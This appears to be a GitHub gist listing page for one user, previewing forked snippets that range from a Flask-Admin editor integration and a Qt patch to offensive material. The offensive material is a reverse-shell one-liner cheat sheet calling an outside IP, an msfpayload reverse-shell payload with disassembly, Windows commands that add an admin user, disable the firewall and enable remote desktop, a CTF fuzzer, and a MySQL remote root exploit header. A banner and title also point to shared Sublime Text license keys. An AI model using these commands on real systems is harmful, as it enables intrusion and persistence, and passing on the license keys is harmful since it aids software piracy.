🔔 NOTE: If you can, please buy software license to support the authors/developers!
- Go to menu Help > Enter License.
- Copy the license key below and paste it into the textbox > Click the Use License button.
xstpl
/ ckedit.py
Last active
December 6, 2016 13:48
— forked from mrjoes/ckedit.py
Flask-Admin and CKEditor WYSIWYG textarea integration. Basically, all you have to do:
1. Create new wtforms widget which will emit 'ckeditor' class
2. Make new wtforms field which will use this widget
3. Create new jinja2 template, which includes ckeditor javascript
4. Tell flask-admin to use new field and new template
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from flask import Flask | |
| from flask.ext.sqlalchemy import SQLAlchemy | |
| from flask.ext import admin, wtf | |
| from flask.ext.admin.contrib import sqlamodel | |
| app = Flask(__name__) | |
| app.config['SECRET_KEY'] = '123456790' | |
| app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.sqlite' | |
| db = SQLAlchemy(app) |
xstpl
/ fuzzer.rb
Last active
August 29, 2015 14:25
— forked from postmodern/fuzzer.rb
PlaidCTF misc 100 fuzzer
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| require 'ronin/network/tcp' | |
| require 'ronin/ui/output/helpers' | |
| require 'combinatorics' | |
| include Ronin::Network::TCP, | |
| Ronin::UI::Output::Helpers | |
| hosts = %w[ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@xstpl:~# msfpayload linux/x86/shell/reverse_nonx_tcp LHOST=192.168.1.1 LPORT=4444 R > reverse_nonx_tcp.bin | |
| root@xstpl:~# ndisasm -b32 -p intel reverse_nonx_tcp.bin | |
| 00000000 31DB xor ebx,ebx ; | |
| 00000002 53 push ebx ; protocol = 0 | |
| 00000003 43 inc ebx ; int socket(int domain, int type, int protocol); | |
| 00000004 53 push ebx ; type = SOCK_STREAM | |
| 00000005 6A02 push byte +0x2 ; domain = AF_UNIX | |
| 00000007 6A66 push byte +0x66 ; int socketcall(int call, unsigned long *args); | |
| 00000009 58 pop eax ; call = 1 (socket) | |
| 0000000A 89E1 mov ecx,esp ; args = domain, type, protocol ;struct sockaddr_in { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #bash | |
| /bin/sh -i >& /dev/tcp/200.93.248.46/83 0>&1 >>> nc -vvlp 83 | |
| #bash | |
| bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
| #bash alt | |
| exec /bin/bash 0&0 2>&0 | |
| #bash alt 2 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #add a user | |
| net user xstpl mwcb /add | |
| #add user to local administrators | |
| net localgroup administrators /add xstpl | |
| #remove firewall | |
| netsh firewall set opmode disable | |
| #enabled remote desktop |
xstpl
/ qt_on_osx_yosimite.patch
Last active
August 29, 2015 14:25
— forked from unixmonkey/qt_on_osx_yosimite.patch
QT 4.8.6 on OSX Yosemite
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --- ./qt-everywhere-opensource-src-4.8.6/src/gui/kernel/qcocoaapplicationdelegate_mac.mm 2014-06-12 10:20:38.000000000 +0300 | |
| +++ ./qt-everywhere-opensource-src-4.8.6/src/gui/kernel/qcocoaapplicationdelegate_mac.mm 2014-06-12 21:59:18.000000000 +0300 | |
| @@ -122,7 +122,7 @@ | |
| [dockMenu release]; | |
| [qtMenuLoader release]; | |
| if (reflectionDelegate) { | |
| - [NSApp setDelegate:reflectionDelegate]; | |
| + [[NSApplication sharedApplication] setDelegate:reflectionDelegate]; | |
| [reflectionDelegate release]; | |
| } |
xstpl
/ Sublime Text License Key.md
Created
December 25, 2015 22:19
Sublime Text 2 License Key, Sublime Text 3 License Key, Sublime Text Full Version.
xstpl
/ 0_ Gmail API for Service Accounts Python 2.7.
Created
January 3, 2016 02:45
— forked from timrichardson/0_ Gmail API for Service Accounts Python 2.7.
Access gmail via gmail api, Service Account method (applicable if you have Google Apps admin access)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| smtp mail sending in cPython blocks the GIL. | |
| This code is tested on python 2.7.8 and I'm using it with web2py | |
| If you use Google Apps for your domain email and if you have admin access, you can easily use the gmail api. | |
| Because you have admin access, you can create a "service account" in the Google Developer Console. | |
| This makes authentication easy. | |
| There are other authorisation methods when you don't have admin access, but they require interaction from the user via a browser. | |
| To use this, you need to install these modules (From PyPI): | |
| pyOpenSSL |
xstpl
/ tomcat-manger.py
Created
November 27, 2016 03:52
— forked from qrtt1/tomcat-manger.py
write a tomcat-manager script for python. ref: http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import urllib2, base64 | |
| import sys | |
| import urllib | |
| class TomcatManager(object): | |
| def __init__(self, endpoint, username, password): | |
| self.endpoint = endpoint |
xstpl
/ MySQL 5.1_5.5 (Windows) - 'MySQLJackpot' Remote Root Exploit
Created
November 30, 2016 01:16
— forked from nu11secur1ty/MySQL 5.1_5.5 (Windows) - 'MySQLJackpot' Remote Root Exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *** | |
| FARLiGHT ELiTE HACKERS LEGACY R3L3ASE | |
| *** | |
| Attached is the MySQL Windows Remote Exploit (post-auth, udf | |
| technique) including the previously released mass scanner. | |
| The exploit is mirrored at the farlight website http://www.farlight.org. | |
| Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday | |
| All owned By Kingcope |